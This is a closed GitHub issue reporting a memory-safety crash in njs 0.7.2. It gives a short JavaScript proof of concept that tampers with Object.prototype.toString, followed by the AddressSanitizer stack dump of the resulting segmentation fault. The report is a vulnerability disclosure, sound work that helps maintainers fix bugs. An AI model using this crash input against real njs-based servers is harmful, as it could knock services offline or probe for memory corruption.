Closed
Description
openedon Feb 15, 2022
Environment
OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : 7bd570b39297d3d91902c93a624c89b08be7a6fe
Version : 0.7.2
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
Proof of concept
function f2(v) {
Object.prototype.toString = v;
}
Object.prototype.toString = f2;
function f() {
"includes"[{}]();
}
new Promise(f);
String.fromCharCode(0,parseInt);
Stack dump
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2064577==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004cac48 bp 0x7ffcc1edfbf0 sp 0x7ffcc1edfbb0 T0)
==2064577==The signal is caused by a READ memory access.
==2064577==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used.
#0 0x4cac48 in njs_lvlhsh_bucket_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17
#1 0x4cac48 in njs_lvlhsh_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:181:20
#2 0x516c4f in njs_object_property /home/q1iq/Documents/origin/njs/src/njs_object_prop.c:59:15
#3 0x4d5963 in njs_value_to_primitive /home/q1iq/Documents/origin/njs/src/njs_value.c:159:19
#4 0x4fb3ab in njs_value_to_number /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:18:15
#5 0x4fb3ab in njs_value_to_numeric /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:54:11
#6 0x4fb3ab in njs_string_from_char_code /home/q1iq/Documents/origin/njs/src/njs_string.c:2036:19
#7 0x53bf9c in njs_function_native_call /home/q1iq/Documents/origin/njs/src/njs_function.c:739:11
#8 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
#9 0x53b43a in njs_function_lambda_call /home/q1iq/Documents/origin/njs/src/njs_function.c:703:11
#10 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
#11 0x4deb7b in njs_vm_start /home/q1iq/Documents/origin/njs/src/njs_vm.c:493:11
#12 0x4c8099 in njs_process_script /home/q1iq/Documents/origin/njs/src/njs_shell.c:903:19
#13 0x4c7484 in njs_process_file /home/q1iq/Documents/origin/njs/src/njs_shell.c:632:11
#14 0x4c7484 in main /home/q1iq/Documents/origin/njs/src/njs_shell.c:316:15
#15 0x7f4beb9e10b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#16 0x41dabd in _start (/home/q1iq/Documents/origin/njs/build/njs+0x41dabd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17 in njs_lvlhsh_bucket_find
==2064577==ABORTING
Credit
Q1IQ(@Q1IQ)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment